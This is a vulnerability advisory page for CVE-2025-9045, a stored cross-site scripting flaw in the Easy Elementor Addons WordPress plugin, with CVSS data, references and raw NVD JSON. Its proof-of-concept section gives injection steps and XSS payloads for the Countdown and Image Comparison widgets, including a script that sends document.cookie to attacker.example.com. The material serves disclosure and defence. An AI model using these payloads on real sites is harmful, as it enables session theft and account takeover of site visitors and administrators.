Security Vulnerability Report
CVE-2025-9045 CVSS 6.4 MEDIUM

CVE-2025-9045

Published: 2025-10-03 12:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Easy Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widget parameters in versions less than, or equal to, 2.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Easy Elementor Addons <= 2.2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2025-9045: Stored XSS in Easy Elementor Addons Plugin
     Affected: Easy Elementor Addons <= 2.2.9
     Required: Contributor or higher WordPress user role -->

<!-- Step 1: Login as Contributor and create/edit a page using Elementor -->
<!-- Step 2: Add the Countdown widget or Image Comparison widget -->
<!-- Step 3: Inject malicious payload into vulnerable widget parameters -->

<!-- Payload example for Countdown widget (inserted into label/title fields): -->
<script>alert('XSS-CVE-2025-9045')</script>

<!-- Or more sophisticated payload for cookie stealing: -->
<script>
var img = new Image();
img.src = 'https://attacker.example.com/steal?cookie=' + document.cookie;
</script>

<!-- Payload example for Image Comparison widget (inserted into caption/label fields): -->
"><img src=x onerror=alert(document.domain)>

<!-- The malicious payload will be stored in the WordPress database as part of the page metadata.
     When any user (including administrators) visits the infected page, the script will execute
     in their browser context. -->

<!-- Example of the vulnerable widget shortcode/data stored in DB: -->
{ "_elementor_data": "[{\"id\":\"abc123\",\"elType\":\"widget\",\"widgetType\":\"countdown\",\"settings\":{\"label_days\":\"<script>alert('XSS')</script>\"}}]" }

References

- https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L864
- https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L868
- https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L871
- https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/image-comparison/widgets/image-comparison.php#L376
- https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/image-comparison/widgets/image-comparison.php#L377
- https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.3.0/modules/countdown/widgets/countdown.php#L871
- https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.3.0/modules/image-comparison/widgets/image-comparison.php#L376
- https://www.wordfence.com/threat-intel/vulnerabilities/id/08640d56-fc76-4062-ab08-19415ad77e5e?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9045",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T12:15:45.340",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Easy Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widget parameters in versions less than, or equal to, 2.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L864", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L868", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/countdown/widgets/countdown.php#L871", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/image-comparison/widgets/image-comparison.php#L376", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.2.8/modules/image-comparison/widgets/image-comparison.php#L377", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.3.0/modules/countdown/widgets/countdown.php#L871", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/easy-elementor-addons/tags/2.3.0/modules/image-comparison/widgets/image-comparison.php#L376", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/08640d56-fc76-4062-ab08-19415ad77e5e?source=cve", "source": "[email protected]"}
    ]
  }
}